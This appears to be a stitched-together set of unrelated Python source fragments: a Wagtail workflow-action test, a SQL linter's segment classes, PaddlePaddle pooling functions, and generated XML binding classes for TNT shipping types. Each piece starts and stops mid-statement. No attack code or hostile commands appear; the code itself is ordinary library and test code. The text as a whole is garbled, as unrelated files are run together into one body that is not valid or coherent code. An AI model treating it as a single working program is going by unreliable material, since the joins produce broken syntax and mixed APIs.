workflow action view (for the approve action) returns a modal with a form for extra data entry: adding a comment """ response = self.client.get( reverse( "wagtailadmin_pages:workflow_action", args=( self.page.id, "approve", self.page.current_workflow_task_state.id, ), ) ) self.assertEqual(response.status_code, 200) self.assertTemplateUsed( response, "wagtailadmin/pages/workflow_action_modal.html" ) html = json.loads(response.content)["html"] self.assertTagInHTML( '<form action="' + reverse( "wagtailadmin_pages:workflow_action", args=( self.page.id, "approve", self.page.current_workflow_task_state.id, ), ) + '" method="POST" novalidate>', html, ) self.assertIn("Comment", html) def
Depth {0}. Expanding: {1}: {2!r}".format( parse_context.parse_depth, stmt.__class__.__name__, curtail_string(stmt.raw, length=40)) verbosity_logger(frame_msg(parse_depth_msg), verbosity=parse_context.verbosity) res = stmt.parse(parse_context=parse_context) if isinstance(res, BaseSegment): segs += (res,) else: # We might get back an iterable of segments segs += tuple(res) # Basic Validation check_still_complete(segments, segs, ()) return segs def raw_list(self): """Return a list of raw elements, mostly for testing or searching.""" buff = [] for s in self.segments: buff += s.raw_list() return buff def iter_raw_seg(self): """Iterate raw segments, mostly for searching.""" for s in self.segments: for seg in s.iter_raw_seg(): yield seg def iter_unparsables(self): """Iterate through any unparsables this segment may contain.""" for s in self.segments: for u in s.iter_unparsables(): yield u def type_set(self): """Return a set of the types contained, mostly for testing.""" typs = {self.type} for s in self.segments: typs |= s.type_set() return typs def __eq__(self, other): # Equal if type, content and pos are the same # NB: this should also work for RawSegment return (type(self) is type(other) and (self.raw == other.raw) and (self.pos_marker == other.pos_marker)) def __len__(self): """Implement a len method to make everyone's lives easier.""" return 1 def is_raw(self): """Return True if this segment has no children.""" return len(self.segments) == 0 @classmethod def expected_string(cls, dialect=None, called_from=None): """Return the expected string for this segment. This is never going to be called on an _instance_ but rather on the class, as part of a grammar, and therefore as part of the matching phase. So we use the match grammar. """ return cls._match_grammar().expected_string(dialect=dialect, called_from=called_from) @classmethod def as_optional(cls): """Construct a copy of this class, but with the optional flag set true. Used in constructing grammars, will make an identical class but with the optional argument set to true. Used in constructing sequences. """ # Now lets make the classname (it indicates the mother class for clarity) classname = "Optional_{0}".format(cls.__name__) # This is the magic, we generate a new class! SORCERY newclass = type(classname, (cls, ), dict(optional=True)) # Now we return that class in the abstract. NOT INSTANTIATED return newclass def apply_fixes(self, fixes): """Apply an iterable of fixes to this segment. Used in applying fixes if we're fixing linting errors. If anything changes, this should return a new version of the segment rather than mutating the original. Note: We need to have fixes to apply AND this must have children. In the case of raw segments, they will be replaced or removed by their parent and so this function should just return self. """ # Let's check what we've been given. if fixes and isinstance(fixes[0], SQLLintError): logging.error("Transforming `fixes` from errors into a list of fixes") # We've got linting errors, let's aggregate them into a list of fixes buff = [] for err in fixes: buff += err.fixes # Overwrite fixes fixes = buff if fixes and not self.is_raw(): # Get a reference to self to start with, but this will rapidly # become a working copy. r = self # Make a working copy seg_buffer = [] todo_buffer = list(self.segments) while True: if len(todo_buffer) == 0: break else: seg = todo_buffer.pop(0) # We don't apply fixes to meta segments if seg.is_meta: seg_buffer.append(seg) continue fix_buff = fixes.copy() unused_fixes = [] while fix_buff: f = fix_buff.pop() if f.anchor == seg: if f.edit_type == 'delete': # We're just getting rid of this segment. seg = None elif f.edit_type in ('edit', 'create'): # We're doing a replacement (it could be a single segment or an iterable) if isinstance(f.edit, BaseSegment): seg_buffer.append(f.edit) else: for s in f.edit: seg_buffer.append(s) if f.edit_type == 'create': # in the case of a creation, also add this segment on the end seg_buffer.append(seg) else: raise ValueError( "Unexpected edit_type: {0!r} in {1!r}".format( f.edit_type, f)) # We've applied a fix here. Move on, this also consumes the fix # TODO: Maybe deal with overlapping fixes later. break else: # We've not used the fix so we should keep it in the list for later. unused_fixes.append(f) else: seg_buffer.append(seg) # Switch over the the unused list fixes = unused_fixes + fix_buff # Then recurse (i.e. deal with the children) (Requeueing) seg_queue = seg_buffer seg_buffer = [] for seg in seg_queue: s, fixes = seg.apply_fixes(fixes) seg_buffer.append(s) # Reform into a new segment r = r.__class__( segments=tuple(seg_buffer), pos_marker=r.pos_marker, validate=False ) # Lastly, before returning, we should realign positions. # Note: Realign also returns a copy return r.realign(), fixes else: return self, fixes def realign(self): """Realign the positions in this segment. Returns: a copy of this class with the pos_markers realigned. Note: this is used mostly during fixes. Realign is recursive. We will assume that the pos_marker of THIS segment is truthful, and that during recursion it will have been set by the parent. This function will align the pos marker if it's direct children, we then recurse to realign their children. """ seg_buffer = [] todo_buffer = list(self.segments) running_pos = self.pos_marker while True: if len(todo_buffer) == 0: # We're done. break else: # Get the first off the buffer seg = todo_buffer.pop(0) # We'll preserve statement indexes so we should keep track of that. # When recreating, we use the DELTA of the index so that's what matter... idx = seg.pos_marker.statement_index - running_pos.statement_index if seg.is_meta: # It's a meta segment, just update the position seg = seg.__class__( pos_marker=running_pos ) elif len(seg.segments) > 0: # It's a compound segment, so keep track of it's children child_segs = seg.segments # Create a new segment of the same type with the new position seg = seg.__class__( segments=child_segs, pos_marker=running_pos ) # Realign the children of that class seg = seg.realign() else: # It's a raw segment... # Create a new segment of the same type with the new position seg = seg.__class__( raw=seg.raw, pos_marker=running_pos ) # Update the running position with the content of that segment running_pos = running_pos.advance_by( raw=seg.raw, idx=idx ) # Add the buffer to my new segment seg_buffer.append(seg) # Create a new version of this class with the new details return self.__class__( segments=tuple(seg_buffer), pos_marker=self.pos_marker ) class RawSegment(BaseSegment): """This is a segment without any subsegments.""" type = 'raw' _is_code = False _is_comment = False _template = '<unset>' _case_sensitive = False _raw_upper = None @property def is_expandable(self): """Return true if it is meaningful to call `expand` on this segment.""" return False @property def is_code(self): """Return True if this segment is code.""" return self._is_code @property def is_comment(self): """Return True if this segment is a comment.""" return self._is_comment def __init__(self, raw, pos_marker): self._raw = raw self._raw_upper = raw.upper() # pos marker is required here self.pos_marker = pos_marker @property def raw_upper(self): """Make an uppercase string from the segments of this segment.""" return self._raw_upper def iter_raw_seg(self): """Iterate raw segments, mostly for searching.""" yield self @property def segments(self): """Return an empty list of child segments. This is in case something tries to iterate on this segment. """ return [] def raw_list(self): """Return a list of the raw content of this segment.""" return [self.raw] def _reconstruct(self): """Return a string of the raw content of this segment.""" return self._raw def __repr__(self): return "<{0}: ({1}) {2!r}>".format( self.__class__.__name__, self.pos_marker, self.raw) def stringify(self, ident=0, tabsize=4, pos_idx=60, raw_idx=80, code_only=False): """Use indentation to render this segment and it's children as a string.""" preface = self._preface(ident=ident, tabsize=tabsize, pos_idx=pos_idx, raw_idx=raw_idx) return preface + '\n' def _suffix(self): """Return any extra output required at the end when logging. NB Override this for specific subclassesses if we want extra output. """ return "{0!r}".format(self.raw) @classmethod def make(cls, template, case_sensitive=False, name=None, **kwargs): """Make a subclass of the segment using a method.""" # Let's deal with the template first if case_sensitive: _template = template else: _template = template.upper() # Use the name if provided otherwise default to the template name = name or _template # Now lets make the classname (it indicates the mother class for clarity) classname = "{0}_{1}".format(name, cls.__name__) # This is the magic, we generate a new class! SORCERY newclass = type(classname, (cls, ), dict(_template=_template, _case_sensitive=case_sensitive,
'x', ['float32', 'float64'], 'avg_pool2d') kernel_size = utils.convert_to_list(kernel_size, 2, 'pool_size') if stride is None: stride = kernel_size else: stride = utils.convert_to_list(stride, 2, 'pool_stride') padding_algorithm = "EXPLICIT" if isinstance(padding, str): padding = padding.upper() if padding not in ["SAME", "VALID"]: raise ValueError( "Unknown Attr(pool_padding): '%s'. It can only be 'SAME' or 'VALID'." % str(padding)) if padding == "VALID": padding_algorithm = "VALID" padding = [0, 0] if ceil_mode != False: raise ValueError( "When Attr(pool_padding) is \"VALID\", Attr(ceil_mode) must be False. " "Received ceil_mode: True.") elif padding == "SAME": padding_algorithm = "SAME" padding = [0, 0] if data_format not in ["NCHW", "NHWC"]: raise ValueError( "Attr(data_format) should be 'NCHW' or 'NHWC'. Received " "Attr(data_format): %s." % str(data_format)) pool_padding = update_padding2d(padding, data_format) if in_dygraph_mode(): output = core.ops.pool2d( x, 'pooling_type', 'avg', 'ksize', kernel_size, 'global_pooling', False, 'padding_algorithm', padding_algorithm, 'strides', stride, 'paddings', pool_padding, 'use_cudnn', True, 'ceil_mode', ceil_mode, 'use_mkldnn', False, 'exclusive', not count_include_pad, 'data_format', data_format) if divisor_override is None: return output else: check_instance(divisor_override, "divisor_override") return output * (kernel_size[0] * kernel_size[1]) / divisor_override op_type = 'pool2d' helper = LayerHelper(op_type, **locals()) dtype = helper.input_dtype() pool_out = helper.create_variable_for_type_inference(dtype) helper.append_op( type=op_type, inputs={"X": x}, outputs={"Out": pool_out}, attrs={ "pooling_type": "avg", "ksize": kernel_size, "global_pooling": False, "strides": stride, "paddings": pool_padding, "padding_algorithm": padding_algorithm, "use_cudnn": True, "ceil_mode": ceil_mode, "use_mkldnn": False, "exclusive": not count_include_pad, "data_format": data_format, }) if divisor_override is None: return pool_out else: check_instance(divisor_override, "divisor_override") return pool_out * (kernel_size[0] * kernel_size[1]) / divisor_override def max_pool3d(x, kernel_size, stride=None, padding=0, return_indices=False, ceil_mode=False, data_format="NCDHW", name=None): """ This operation applies 3D max pooling over input features based on the input, and kernel_size, stride, padding parameters. Input(X) and Output(Out) are in NCDHW format, where N is batch size, C is the number of channels, H is the height of the feature, D is the depth of the feature, and W is the width of the feature. Example: Input: X shape: $(N, C, D_{in}, H_{in}, W_{in})$ Attr: kernel_size: ksize Output: Out shape: $(N, C, D_{out}, H_{out}, W_{out})$ $$ \text{out}(N_i, C_j, d, h, w) ={} & \max_{k=0, \ldots, ksize[0]-1} \max_{m=0, \ldots, ksize[1]-1} \max_{n=0, \ldots, ksize[2]-1} \\ & \text{input}(N_i, C_j, \text{stride[0]} \times d + k, \text{stride[1]} \times h + m, \text{stride[2]} \times w + n) $$ Args: x (Tensor): The input tensor of pooling operator, which is a 5-D tensor with shape [N, C, D, H, W]. The format of input tensor is `"NCDHW"` or `"NDHWC"`, where `N` is batch size, `C` is the number of channels, `D` is the depth of the feature, `H` is the height of the feature, and `W` is the width of the feature. kernel_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list, it must contain three integers, (pool_size_Depth, pool_size_Height, pool_size_Width). Otherwise, the pool kernel size will be the cube of an int. stride (string|int|list|tuple)): The pool padding. If `pool_padding` is a string, either 'VALID' or 'SAME' which is the padding algorithm. If pool stride size is a tuple or list, it must contain three integers, `[stride_Depth, stride_Height, stride_Width]`. Otherwise, the pool stride size will be a cube of an int. padding (int|list|tuple): The pool padding size. If pool padding size is a tuple or list, it could be in three forms: `[pad_depth, pad_height, pad_width]` or `[pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`, and when `data_format` is `"NCDHW"`, `pool_padding` can be in the form `[[0,0], [0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`. when `data_format` is `"NDHWC"`, `pool_padding` can be in the form `[[0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`. ceil_mode (bool): ${ceil_mode_comment} return_indices (bool): Whether to return the max indices along with the outputs. data_format (string): The data format of the input and output data. An optional string from: `"NCDHW"`, `"NDHWC"`. The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of: `[batch_size, input_channels, input_depth, input_height, input_width]`. name(str, optional): For detailed information, please refer to :ref:`api_guide_Name`. Usually name is no need to set and None by default. Returns: Tensor: The output tensor of pooling result. The data type is same as input tensor. Raises: ValueError: If `padding` is a string, but not "SAME" or "VALID". ValueError: If `padding` is "VALID", but `ceil_mode` is True. ShapeError: If the output's shape calculated is not greater than 0. Examples: .. code-block:: python import paddle import paddle.nn.functional as F import numpy as np paddle.disable_static() # max pool3d input = paddle.to_tensor(np.random.uniform(-1, 1, [1, 3, 32, 32, 32]).astype(np.float32)) output = F.max_pool2d(input, kernel_size=2, stride=2, padding=0) output.shape [1, 3, 16, 16, 16] # for return_indices=True input = paddle.to_tensor(np.random.uniform(-1, 1, [1, 3, 32, 32, 32]).astype(np.float32)) output, max_indices = paddle.nn.functional.max_pool3d(input, kernel_size = 2, stride = 2, padding=0, return_indices=True) # output.shape [None, 3, 16, 16, 16], max_indices.shape [None, 3, 16, 16, 16], """ check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'max_pool3d') kernel_size = utils.convert_to_list(kernel_size, 3, 'pool_size') if stride is None: stride = kernel_size else: stride = utils.convert_to_list(stride, 3, 'pool_stride') padding_algorithm = "EXPLICIT" if isinstance(padding, str): padding = padding.upper() if padding not in ["SAME", "VALID"]: raise ValueError( "Unknown Attr(pool_padding): '%s'. It can only be 'SAME' or 'VALID'." % str(padding)) if padding == "VALID": padding_algorithm = "VALID" padding = [0, 0, 0] if ceil_mode != False: raise ValueError( "When Attr(pool_padding) is \"VALID\", ceil_mode must be False. " "Received ceil_mode: True.") elif padding == "SAME": padding_algorithm = "SAME" padding = [0, 0, 0] if data_format not in ["NCDHW", "NDHWC"]: raise ValueError( "Attr(data_format) should be 'NCDHW' or 'NDHWC'. Received " "Attr(data_format): %s" % str(data_format)) padding = update_padding3d(padding, data_format) if in_dygraph_mode(): output = core.ops.max_pool3d_with_index( x, 'pooling_type', 'max', 'ksize', kernel_size, 'strides', stride, 'paddings', padding, 'global_pooling', False, 'padding_algorithm', padding_algorithm, 'use_cudnn', True, 'ceil_mode', ceil_mode, 'use_mkldnn', False, 'exclusive', True, 'data_format', data_format) return output if return_indices else output[0] op_type = "max_pool3d_with_index" helper = LayerHelper(op_type, **locals()) dtype = helper.input_dtype() pool_out = helper.create_variable_for_type_inference(dtype) mask = helper.create_variable_for_type_inference(dtype) outputs = {"Out": pool_out, "Mask": mask} helper.append_op( type=op_type, inputs={"X": x}, outputs=outputs, attrs={ "pooling_type": 'max', "ksize": kernel_size, "global_pooling": False, "strides": stride, "paddings": padding, "padding_algorithm": padding_algorithm, "use_cudnn": True, "ceil_mode": ceil_mode, "use_mkldnn": False, "exclusive": False, "data_format": data_format, }) return (pool_out, mask) if return_indices else pool_out def avg_pool3d(x, kernel_size, stride=None, padding=0, ceil_mode=False, count_include_pad=False, divisor_override=None, data_format="NCDHW", name=None): """ This operation applies 3D max pooling over input features based on the input, and kernel_size, stride, padding parameters. Input(X) and Output(Out) are in NCDHW format, where N is batch size, C is the number of channels, H is the height of the feature, D is the depth of the feature, and W is the width of the feature. Args: input (Tensor): The input tensor of pooling operator, which is a 5-D tensor with shape [N, C, D, H, W], where `N` is batch size, `C` is the number of channels, `D` is the depth of the feature, `H` is the height of the feature, and `W` is the width of the feature. kernel_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list, it must contain three integers, (pool_size_Depth, pool_size_Height, pool_size_Width). Otherwise, the pool kernel size will be the cube of an int. stride (string|int|list|tuple)): The pool padding. If `pool_padding` is a string, either 'VALID' or 'SAME' which is the padding algorithm. If pool stride size is a tuple or list, it must contain three integers, `[stride_Depth, stride_Height, stride_Width]`. Otherwise, the pool stride size will be a cube of an int. padding (int|list|tuple): The pool padding size. If pool padding size is a tuple or list, it could be in three forms: `[pad_depth, pad_height, pad_width]` or `[pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`, and when `data_format` is `"NCDHW"`, `pool_padding` can be in the form `[[0,0], [0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`. when `data_format` is `"NDHWC"`, `pool_padding` can be in the form `[[0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`. ceil_mode (bool): ${ceil_mode_comment} count_include_pad (bool): Whether to exclude padding points in average pooling mode, default is True. divisor_override (int|float) if specified, it will be used as divisor, otherwise kernel_size will be used. Default None. data_format (string): The data format
self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxLength restriction on stringMaxLength30' % {"value" : encode_str_2_3(value), "lineno": lineno} ) result = False return result def hasContent_(self): if ( self.name is not None or self.telephoneNumber is not None or self.emailAddress is not None ): return True else: return False def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='contactType', pretty_print=True): imported_ns_def_ = GenerateDSNamespaceDefs_.get('contactType') if imported_ns_def_ is not None: namespacedef_ = imported_ns_def_ if pretty_print: eol_ = '\n' else: eol_ = '' if self.original_tagname_ is not None and name_ == 'contactType': name_ = self.original_tagname_ if UseCapturedNS_ and self.ns_prefix_: namespaceprefix_ = self.ns_prefix_ + ':' showIndent(outfile, level, pretty_print) outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', )) already_processed = set() self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='contactType') if self.hasContent_(): outfile.write('>%s' % (eol_, )) self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='contactType', pretty_print=pretty_print) showIndent(outfile, level, pretty_print) outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_)) else: outfile.write('/>%s' % (eol_, )) def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='contactType'): pass def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='contactType', fromsubclass_=False, pretty_print=True): if pretty_print: eol_ = '\n' else: eol_ = '' if self.name is not None: namespaceprefix_ = self.name_nsprefix_ + ':' if (UseCapturedNS_ and self.name_nsprefix_) else '' showIndent(outfile, level, pretty_print) outfile.write('<%sname>%s</%sname>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.name), input_name='name')), namespaceprefix_ , eol_)) if self.telephoneNumber is not None: namespaceprefix_ = self.telephoneNumber_nsprefix_ + ':' if (UseCapturedNS_ and self.telephoneNumber_nsprefix_) else '' showIndent(outfile, level, pretty_print) outfile.write('<%stelephoneNumber>%s</%stelephoneNumber>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.telephoneNumber), input_name='telephoneNumber')), namespaceprefix_ , eol_)) if self.emailAddress is not None: namespaceprefix_ = self.emailAddress_nsprefix_ + ':' if (UseCapturedNS_ and self.emailAddress_nsprefix_) else '' showIndent(outfile, level, pretty_print) outfile.write('<%semailAddress>%s</%semailAddress>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.emailAddress), input_name='emailAddress')), namespaceprefix_ , eol_)) def build(self, node, gds_collector_=None): self.gds_collector_ = gds_collector_ if SaveElementTreeNode: self.gds_elementtree_node_ = node already_processed = set() self.ns_prefix_ = node.prefix self.buildAttributes(node, node.attrib, already_processed) for child in node: nodeName_ = Tag_pattern_.match(child.tag).groups()[-1] self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_) return self def buildAttributes(self, node, attrs, already_processed): pass def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None): if nodeName_ == 'name': value_ = child_.text value_ = self.gds_parse_string(value_, node, 'name') value_ = self.gds_validate_string(value_, node, 'name') self.name = value_ self.name_nsprefix_ = child_.prefix # validate type stringMaxLength30 self.validate_stringMaxLength30(self.name) elif nodeName_ == 'telephoneNumber': value_ = child_.text value_ = self.gds_parse_string(value_, node, 'telephoneNumber') value_ = self.gds_validate_string(value_, node, 'telephoneNumber') self.telephoneNumber = value_ self.telephoneNumber_nsprefix_ = child_.prefix # validate type stringMaxLength30 self.validate_stringMaxLength30(self.telephoneNumber) elif nodeName_ == 'emailAddress': value_ = child_.text value_ = self.gds_parse_string(value_, node, 'emailAddress') value_ = self.gds_validate_string(value_, node, 'emailAddress') self.emailAddress = value_ self.emailAddress_nsprefix_ = child_.prefix # end class contactType class accountType(GeneratedsSuper): """Information about a TNT account which includes the account number and country code.""" __hash__ = GeneratedsSuper.__hash__ subclass = None superclass = None def __init__(self, accountNumber=None, accountCountry=None, gds_collector_=None, **kwargs_): self.gds_collector_ = gds_collector_ self.gds_elementtree_node_ = None self.original_tagname_ = None self.parent_object_ = kwargs_.get('parent_object_') self.ns_prefix_ = None self.accountNumber = accountNumber self.validate_stringMaxLength10(self.accountNumber) self.accountNumber_nsprefix_ = None self.accountCountry = accountCountry self.validate_stringMinLength2MaxLength2(self.accountCountry) self.accountCountry_nsprefix_ = None def factory(*args_, **kwargs_): if CurrentSubclassModule_ is not None: subclass = getSubclassFromModule_( CurrentSubclassModule_, accountType) if subclass is not None: return subclass(*args_, **kwargs_) if accountType.subclass: return accountType.subclass(*args_, **kwargs_) else: return accountType(*args_, **kwargs_) factory = staticmethod(factory) def get_ns_prefix_(self): return self.ns_prefix_ def set_ns_prefix_(self, ns_prefix): self.ns_prefix_ = ns_prefix def get_accountNumber(self): return self.accountNumber def set_accountNumber(self, accountNumber): self.accountNumber = accountNumber def get_accountCountry(self): return self.accountCountry def set_accountCountry(self, accountCountry): self.accountCountry = accountCountry def validate_stringMaxLength10(self, value): result = True # Validate type stringMaxLength10, a restriction on xsd:string. if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None: if not isinstance(value, str): lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, }) return False if len(value) > 10: lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxLength restriction on stringMaxLength10' % {"value" : encode_str_2_3(value), "lineno": lineno} ) result = False return result def validate_stringMinLength2MaxLength2(self, value): result = True # Validate type stringMinLength2MaxLength2, a restriction on xsd:string. if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None: if not isinstance(value, str): lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, }) return False if len(value) > 2: lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxLength restriction on stringMinLength2MaxLength2' % {"value" : encode_str_2_3(value), "lineno": lineno} ) result = False if len(value) < 2: lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minLength restriction on stringMinLength2MaxLength2' % {"value" : encode_str_2_3(value), "lineno": lineno} ) result = False return result def hasContent_(self): if ( self.accountNumber is not None or self.accountCountry is not None ): return True else: return False def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='accountType', pretty_print=True): imported_ns_def_ = GenerateDSNamespaceDefs_.get('accountType') if imported_ns_def_ is not None: namespacedef_ = imported_ns_def_ if pretty_print: eol_ = '\n' else: eol_ = '' if self.original_tagname_ is not None and name_ == 'accountType': name_ = self.original_tagname_ if UseCapturedNS_ and self.ns_prefix_: namespaceprefix_ = self.ns_prefix_ + ':' showIndent(outfile, level, pretty_print) outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', )) already_processed = set() self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='accountType') if self.hasContent_(): outfile.write('>%s' % (eol_, )) self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='accountType', pretty_print=pretty_print) showIndent(outfile, level, pretty_print) outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_)) else: outfile.write('/>%s' % (eol_, )) def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='accountType'): pass def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='accountType', fromsubclass_=False, pretty_print=True): if pretty_print: eol_ = '\n' else: eol_ = '' if self.accountNumber is not None: namespaceprefix_ = self.accountNumber_nsprefix_ + ':' if (UseCapturedNS_ and self.accountNumber_nsprefix_) else '' showIndent(outfile, level, pretty_print) outfile.write('<%saccountNumber>%s</%saccountNumber>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.accountNumber), input_name='accountNumber')), namespaceprefix_ , eol_)) if self.accountCountry is not None: namespaceprefix_ = self.accountCountry_nsprefix_ + ':' if (UseCapturedNS_ and self.accountCountry_nsprefix_) else '' showIndent(outfile, level, pretty_print) outfile.write('<%saccountCountry>%s</%saccountCountry>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.accountCountry), input_name='accountCountry')), namespaceprefix_ , eol_)) def build(self, node, gds_collector_=None): self.gds_collector_ = gds_collector_ if SaveElementTreeNode: self.gds_elementtree_node_ = node already_processed = set() self.ns_prefix_ = node.prefix self.buildAttributes(node, node.attrib, already_processed) for child in node: nodeName_ = Tag_pattern_.match(child.tag).groups()[-1] self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_) return self def buildAttributes(self, node, attrs, already_processed): pass def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None): if nodeName_ == 'accountNumber': value_ = child_.text value_ = self.gds_parse_string(value_, node, 'accountNumber') value_ = self.gds_validate_string(value_, node, 'accountNumber') self.accountNumber = value_ self.accountNumber_nsprefix_ = child_.prefix # validate type stringMaxLength10 self.validate_stringMaxLength10(self.accountNumber) elif nodeName_ == 'accountCountry': value_ = child_.text value_ = self.gds_parse_string(value_, node, 'accountCountry') value_ = self.gds_validate_string(value_, node, 'accountCountry') self.accountCountry = value_ self.accountCountry_nsprefix_ = child_.prefix # validate type stringMinLength2MaxLength2 self.validate_stringMinLength2MaxLength2(self.accountCountry) # end class accountType class depotType(GeneratedsSuper): """Details relating to a TNT depot which could be the origin, destination or transit depot on the route calculated by TNT to deliver a consignment.""" __hash__ = GeneratedsSuper.__hash__ subclass = None superclass = None def __init__(self, depotCode=None, gds_collector_=None, **kwargs_): self.gds_collector_ = gds_collector_ self.gds_elementtree_node_ = None self.original_tagname_ = None self.parent_object_ = kwargs_.get('parent_object_') self.ns_prefix_ = None self.depotCode = depotCode self.validate_stringMinLength3MaxLength3(self.depotCode) self.depotCode_nsprefix_ = None def factory(*args_, **kwargs_): if CurrentSubclassModule_ is not None: subclass = getSubclassFromModule_( CurrentSubclassModule_, depotType) if subclass is not None: return subclass(*args_, **kwargs_) if depotType.subclass: return depotType.subclass(*args_, **kwargs_) else: return depotType(*args_, **kwargs_) factory = staticmethod(factory) def get_ns_prefix_(self): return self.ns_prefix_ def set_ns_prefix_(self, ns_prefix): self.ns_prefix_ = ns_prefix def get_depotCode(self): return self.depotCode def set_depotCode(self, depotCode): self.depotCode = depotCode def validate_stringMinLength3MaxLength3(self, value): result = True # Validate type stringMinLength3MaxLength3, a restriction on xsd:string. if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None: if not isinstance(value, str): lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, }) return False if len(value) > 3: lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxLength restriction on stringMinLength3MaxLength3' % {"value" : encode_str_2_3(value), "lineno": lineno} ) result = False if len(value) < 3: lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minLength restriction on stringMinLength3MaxLength3' % {"value" : encode_str_2_3(value), "lineno": lineno} ) result = False return result def hasContent_(self): if ( self.depotCode is not None ): return True else: return False def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='depotType', pretty_print=True): imported_ns_def_ = GenerateDSNamespaceDefs_.get('depotType') if imported_ns_def_ is not None: namespacedef_ = imported_ns_def_ if pretty_print: eol_ = '\n' else: eol_ = '' if self.original_tagname_ is not None and name_ == 'depotType': name_ = self.original_tagname_
name) self.rank = _cast(None, rank) if label is None: self.label = [] else: self.label = label def factory(*args_, **kwargs_): if layerType.subclass: return layerType.subclass(*args_, **kwargs_) else: return layerType(*args_, **kwargs_) factory = staticmethod(factory) def get_label(self): return self.label def set_label(self, label): self.label = label def add_label(self, value): self.label.append(value) def insert_label(self, index, value): self.label[index] = value def get_name(self): return self.name def set_name(self, name): self.name = name def get_rank(self): return self.rank def set_rank(self, rank): self.rank = rank def export(self, outfile, level, namespace_='fn:', name_='layerType', namespacedef_=''): showIndent(outfile, level) outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', )) self.exportAttributes(outfile, level, [], namespace_, name_='layerType') if self.hasContent_(): outfile.write('>\n') self.exportChildren(outfile, level + 1, namespace_, name_) showIndent(outfile, level) outfile.write('</%s%s>\n' % (namespace_, name_)) else: outfile.write('/>\n') def exportAttributes(self, outfile, level, already_processed, namespace_='fn:', name_='layerType'): if self.name is not None and 'name' not in already_processed: already_processed.append('name') outfile.write(' name=%s' % (self.gds_format_string(quote_attrib(self.name).encode(ExternalEncoding), input_name='name'), )) if self.rank is not None and 'rank' not in already_processed: already_processed.append('rank') outfile.write(' rank=%s' % (quote_attrib(self.rank), )) def exportChildren(self, outfile, level, namespace_='fn:', name_='layerType', fromsubclass_=False): for label_ in self.label: label_.export(outfile, level, namespace_, name_='label') def hasContent_(self): if ( self.label ): return True else: return False def exportLiteral(self, outfile, level, name_='layerType'): level += 1 self.exportLiteralAttributes(outfile, level, [], name_) if self.hasContent_(): self.exportLiteralChildren(outfile, level, name_) def exportLiteralAttributes(self, outfile, level, already_processed, name_): if self.name is not None and 'name' not in already_processed: already_processed.append('name') showIndent(outfile, level) outfile.write('name = "%s",\n' % (self.name,)) if self.rank is not None and 'rank' not in already_processed: already_processed.append('rank') showIndent(outfile, level) outfile.write('rank = %s,\n' % (self.rank,)) def exportLiteralChildren(self, outfile, level, name_): showIndent(outfile, level) outfile.write('label=[\n') level += 1 for label_ in self.label: showIndent(outfile, level) outfile.write('model_.labelType(\n') label_.exportLiteral(outfile, level, name_='labelType') showIndent(outfile, level) outfile.write('),\n') level -= 1 showIndent(outfile, level) outfile.write('],\n') def build(self, node): self.buildAttributes(node, node.attrib, 